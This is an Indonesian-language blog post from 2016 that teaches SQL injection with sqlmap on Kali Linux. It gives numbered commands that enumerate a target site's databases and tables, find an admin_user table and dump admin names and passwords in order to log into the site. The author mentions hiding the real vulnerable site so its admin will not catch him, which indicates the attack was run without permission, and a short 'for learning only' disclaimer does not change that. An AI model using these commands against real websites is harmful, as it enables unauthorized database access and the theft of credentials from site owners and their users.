/ Tanpa Label / Tutorial Sql Injection Dengan Sql Map Dikali linux

Kamis, 01 September 2016

Tutorial Sql Injection Dengan Sql Map Dikali linux

    Hallo sob untuk Pertama kali posting diblog ini Gua Mau Berbagi Teknik
yaitu teknik Sql Injection dengan sqlmap ,sqlmap itu merupakan salah satu tool yang sudah disediakan oleh system operasi kali linux .sebelum Menuju ke tekniknya lebih baik menganal dulu apa itu sql injection.



Sql Injection adalah Teknik Menyerang pada system keamanan dimana seorang penyerang dapat memasukan perintah-perintah pada url yang bertujuan mendapatkan akses Database pada suatu system.

nah itu sedikit penjelasannya ,oke kita harus menyiapkan Target dulu sebelum melakukan aksi penyerangan .nah saya anggap loe udah dapat targetnya ya mbah :)

1.Pertama buka sqlmap diterminal kali linux Ketik sqlmap -h

2.Masukan Perintah sqlmap -u target.com --dbs
   contoh : gambar
                                  
 

 nah nanti akan muncul databasenya ,Dibawah ini contohnya :
[*] information_schema
[*] magnoliasratchadamr




3.kita buka tabel didatabase magnoliasratchadamr Ketik diterminal
sqlmap -u target.com -D magnoliasratchadamr --tables

 nanti akan muncul beberapa tabel sepertI gambar berikut



4.Kemudian cari tabel yang berhubungan dengan Username dan password , nah saya coba membuka tabel dari admin_user

Dengan cara mengetikan diterminal

sqlmap -u target.com -D magnoliasratchadamr -T admin_user --columns

maka hasilnya seperti yang saya inginkan ternyata muncul admin_name dan admin_pass 

lihat gambar agar lebih jelas



5.Terakhir kita tingal membuka columsnya admin_name,admin_pass  ketik diterminal

sqlmap -u target.com -D magnoliasratchadamr -T admin_user -C admin_id,admin_pass --dump

nah nanti akan muncul username dan passwornya seperti ini


Selesai tuh muncul username dan passwordnya tinggal kita masuk cari login dari website tersebut ,gimana mudahkan silahkan mencoba semoga berhasil,bila gagal pastikan target website loe vuln sql injection atau rentan terhadap serangan sql injection .

catatan :
1.Gua tidak menampilkan website yg vuln sql karena apabila ketahuan admin website tersebut nanti gua bisa dapat sanksi

2.tutor ini hanya semata-mata untuk Pembelajaran saja tentang Penyerangan lewat sql injection pada sebuag website

3.Bila tutorial ini disalahgunakan gua sebagai admin tidak bertanggung jawab apa bila terjadi hal-hal yang tidak diinginkan

Sekian turorial dari gua yo mbah :D Semoga membantu dan Menambah Referensi loe ,Bila Kurang jelas silahkan Komentar dibawah :)






Bagikan

Jangan lewatkan

Tutorial Sql Injection Dengan Sql Map Dikali linux
4/ 5
Oleh
Komentar

Subscribe via email

Suka dengan artikel di atas? Tambahkan email Anda untuk berlangganan.

Langganan: Posting Komentar (Atom)